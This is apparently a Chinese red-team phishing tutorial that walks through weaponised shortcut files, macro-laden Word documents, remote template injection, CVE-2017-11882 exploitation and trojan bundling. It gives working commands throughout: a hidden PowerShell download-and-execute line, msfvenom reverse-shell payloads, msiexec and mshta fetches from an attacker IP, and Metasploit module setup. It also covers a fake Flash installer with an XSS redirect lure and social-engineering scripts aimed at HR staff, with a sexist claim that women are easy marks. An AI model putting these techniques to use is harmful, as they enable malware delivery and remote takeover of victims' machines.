lik

link文件，即快捷方式

比如一个txt文件，我们创建一个它的快捷方式，然后修改它的目标地址：

这时可以看到它的ico图标被修改了，我们可以直接修改它的图标为txt类型的ico

但是⽤系统⾃带的ico去做⽂件图标替换的话，有个弊端，即当替换的ico在⽬标机器上不存在时，就会出现类似空⽩ico图标

在实施钓⻥过程中，我们可以在"⽬标"栏写⼊⾃⼰的恶意命令，如powershell上线命令:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.107.129:8006/a'))"

也可以使用msiexec.exe，系统进程，是Windows Installer的一部分,利用此进程来加载我们shellcode可以达到一定的规避作用。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.107.129 lport=6688 -f msi > shell.txt

c:\windows\system32\msiexec.exe /q /i http://xxx/shell.txt

Office钓鱼：

漏洞环境及利用工具：

1、Windows Server 2012 R2 x64
2、Office 2016
3、msf
4、CobaltStrike

基础了解：

宏是Office自带的一种高级脚本特性，通过VBA代码，可以在Office中去完成某项特定的任务，而不必再重复相同的动作，目的是让用户文档中的一些任务自动化。而宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上

Visual Basic for Applications（VBA）是Visual Basic的一种宏语言，是微软开发出来在其桌面应用程序中执行通用的自动化(OLE)任务的编程语言。主要能用来扩展Windows的应用程序功能，特别是Microsoft Office软件，也可说是一种应用程式视觉化的Basic 脚本。

常用的套路使对方开启宏：

• 文档是被保护状态，需要启用宏才能查看；
• 添加一张模糊的图片，提示需要启用宏才能查看高清图片；
• 提示要查看文档，按给出的一系列步骤操作；
• 贴一张某杀毒软件的Logo图片，暗示文档被安全软件保护。

利用过程：

1、CobaltStrike生成宏、msf生成宏：

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.107.129 lport=6688 -f vba -o shellcode.txt

2、打开Word文档，点击 "Word 选项 — 自定义功能区 — 开发者工具(勾选) — 确定"

3、点击 “开发工具 — Visual Basic”，双击 “ThisDocument” ，将原有内容全部清空，然后将CobaltStrike生成宏payload全部粘贴进去，保存并关闭该 VBA 编辑器

4、另存为的Word类型务必要选”Word 97-2003 文档 (*.doc)”，即 doc 文件，保证低版本可以打开。之后关闭，再打开即可执行宏代码

默认情况下，Office已经禁用所有宏，在打开Word文档的时候发出通知。这是如果目标选择启用宏，CobaltStrike的Beacon就会上线

不足：宏代码是存在本地的，极易被杀软查杀

word插入外部对象：

这里可以修改成doc图标，改变题注，更加逼真。双击，选择确定，即可上线。

远程模板注入宏代码：

利用原理：

利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的，所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式，然后加载模板执行恶意模板的宏

发送的文档本身是不带恶意代码的，能过很多静态的检测。只需要在远程DOTM文档中编写宏病毒或者宏木马即可完成攻击

利用过程：

1、编写一个带有宏代码的DOTM文档，上传服务器
2、编写一个能够远程连接的DOCX文档：
这里我们直接在网上找简历模板文件：

注意：不要编写纯文本的文档

将我们下载的docx文档压缩成zip格式，并解压查看其目录结构

右键选择"编辑"，可以看到如下所示内容，其中，Target所指的路径即我们要修改的位置

将其修改为我们dotm文件所在的url

将其中所有目录及文件选中，点击右键压缩，选中压缩文件格式为zip
然后将其后缀名修改为docx，再将其打开

选择启用宏以后，远程服务器的模板成功加载：

CS成功上线：

CVE-2017-11882：

利用范围：

Office 2003到2016的所有版本

项目地址：https://github.com/Ridter/CVE-2017-11882

漏洞检验：

我们可以先弹出个计算器，测试是否存在漏洞：

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

将生成的test.doc上传到目标主机，打开并观察是否存在漏洞

通过msf利用漏洞：

项目地址：https://github.com/0x09AL/CVE-2017-11882-metasploit

cp cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/local/
cp cve-2017-11882.rtf /usr/share/metasploit-framework/data/exploits/

# 打开msf，重新加载模块
reload_all

search cve_2017_11882

use exploit/windows/local/cve_2017_11882
set payload windows/meterpreter/reverse_tcp
set uripath test
set lhost 192.168.107.129
set lport 7777
exploit -j

另外打开一个终端，执行如下命令，生成恶意doc文件

python Command_CVE-2017-11882.py -c "mshta http://192.168.107.129:8080/test" -o test2.doc

将恶意doc文件上传到目标服务器并打开，成功上线：

那么现在的问题就是如何诱导用户点击运行宏呢？

试想以下场景：

通过简历投递发送给HR进行钓鱼，而HR大多数是女生，女生比较善良、不设防，又非技术人员，绝对是属于安全意识最薄弱的人之一

尝试手段：

简历背景为一个虚化的简历图片，然后在上方加入一段文字，告诉受害者：之所以简历看不清楚是因为你没有点击宏运行，要想看清，请点击运行宏

如下图所示：（图片来源于红蓝对抗之邮件钓鱼攻击）

个人感觉还有很多话术待学习，真想找人试验一下~（提高HR的防钓鱼安全意识）

自解压捆绑文件的利用：

这里我们以flash钓鱼为例：

前期准备：

1、免杀马
2、域名注册
3、vps服务器

flash官网的钓鱼源码：
https://github.com/r00tSe7en/Fake-flash.cn

利用过程：

利用winrar实现捆绑：

1.准备好的木马和官网的flash安装程序
2.鼠标右键，添加到压缩文件。
3.选择"创建自解压格式压缩文件"
4.点击高级，选择"自解压选项"
5.解压路径为：C:\windows\temp
6.点击设置，提取后运行处填写：flash.exe、flashplayer_install_cn.exe
7.点击模式，选择"全部隐藏"
8.点击更新，选择"解压并更新文件"以及"覆盖所有文件"
9.点击确定，返回后修改压缩文件名，尽量逼真一些

使用ResourceHacker修改图标:

1.通过ResourceHacker打开原版的flash安装程序，点击Icon Group文件夹中的文件，鼠标右键保存“*.ico资源”，即可导出ico图标。
2.再利用ResourceHacker打开刚刚打包好的文件，点击Icon Group文件夹中的文件，鼠标右键替换ico图标，最后保存

最后实现的效果如图所示：

打开flash安装程序以后，木马已悄然上线~

上传fake网站的源码和刚刚做的捆绑木马至服务器，开放Web服务

利用XSS弹框提示钓鱼：

window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低，请尝试升级后访问改页面!");window.location.href="http://x.x.x.x";

实现效果：

点击"确定"后，即跳转到精心伪造的Flash下载页面：

参考如下：

红蓝对抗之邮件钓鱼攻击
Office宏的基本利用
利用DOCX文档远程模板注入执行宏代码
Office钓鱼之传世经典CVE-2017-11882分析学习
Flash水坑钓鱼